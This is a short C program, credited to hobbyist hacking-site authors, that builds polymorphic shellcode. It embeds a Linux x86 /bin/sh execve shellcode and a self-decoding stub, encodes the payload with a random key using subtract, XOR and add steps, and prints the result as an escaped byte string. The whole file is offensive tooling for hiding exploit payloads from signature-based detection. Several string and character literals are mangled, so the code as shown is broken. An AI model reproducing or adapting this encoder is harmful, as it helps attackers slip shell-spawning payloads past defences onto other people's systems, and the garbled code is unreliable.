/*
A polymorphic shellcode maker
original prorgam created by Rizki Wicaksono(http://www.ilmuhacking.com)
i add some functions to make it more interesting,
i add "sub,add" functions beside the original xor into decoder

otoy(http://otoyrood.wordpress.com)
0x82010
*/

#include <sys/time.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int getnumber(int quo) {
int seed;
struct timeval tm;
gettimeofday( &tm, NULL );
seed = tm.tv_sec + tm.tv_usec;
srandom( seed );
return (random() % quo);
}

void print_code(char *data) {
int i,l=0;
for (i = 0; i < strlen(data); ++i) {
if (l==0) {
printf(""");
}
if (l >= 15) {
printf(""n"");
l = 0;
}
printf("\x%02x", ((unsigned char *)data)[i]);
++l;
}
printf("";nn");
}

int main() {
char shellcode[] =
/* "/bin/sh" shellcode*/
/* put our own shellcode here */
"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";

int count;
int number = getnumber(200);
int badchar = 0;
int ldecoder;
int lshellcode = strlen(shellcode);
char *result;

char decoder[] =
"\xeb\x13\x5e\x31\xc9\xb1\x00\x80\x06\x00\x80\x36\x00\x80\x2e"
"\x00\x46\xe2\xf4\xeb\x05\xe8\xe8\xff\xff\xff";
decoder[6] = lshellcode;
decoder[9] = number;
decoder[12]= number;
decoder[15]= number;

ldecoder = strlen(decoder);

do {
if(badchar == 1) {
number = getnumber(10);
decoder[9] = number;
decoder[12]= number;
decoder[15]= number;

badchar = 0;
printf("New Key: %2xn", number);
}
for(count=0; count < lshellcode; count++) {
shellcode[count] = shellcode[count] - number;
shellcode[count] = shellcode[count] ^ number;
shellcode[count] = shellcode[count] + number;
if(shellcode[count] == '') {
badchar = 1;
}
}
} while(badchar == 1);
decoder[8] = 46;
decoder[14] = 6;
result = malloc(lshellcode + ldecoder);
strcat(result,decoder);
strcat(result,shellcode);

printf("Key: %02xn",number);
print_code(result);
}